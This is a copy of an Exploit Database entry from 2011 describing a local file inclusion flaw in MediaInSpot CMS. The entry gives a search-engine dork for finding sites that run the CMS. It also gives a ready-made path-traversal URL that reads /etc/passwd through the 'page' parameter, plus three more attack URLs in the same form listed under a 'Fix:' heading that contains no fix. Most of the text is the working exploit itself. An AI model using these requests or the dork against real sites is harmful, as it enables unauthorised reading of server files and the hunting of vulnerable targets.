MediaInSpot CMS – Local File Inclusion (2)

• Exploit Database
• 105 阅读

• 作者： wlhaan haker
  日期： 2011-05-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17292/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  #Name : Media In Spot LFI Vulnerability #Date : May,16 2011 #Vendor Url :http:http://www.mediainspot.com/   #Dork:" "Powred By Media In Spot""   #Author : wlhaan haker <iit[at]hotmail.com>     ############################################################################################################### Exploit: http://server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd ############################################################################################################### Fix:   demo   http://site.com/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd   http://site.com/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd   http://site.com/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd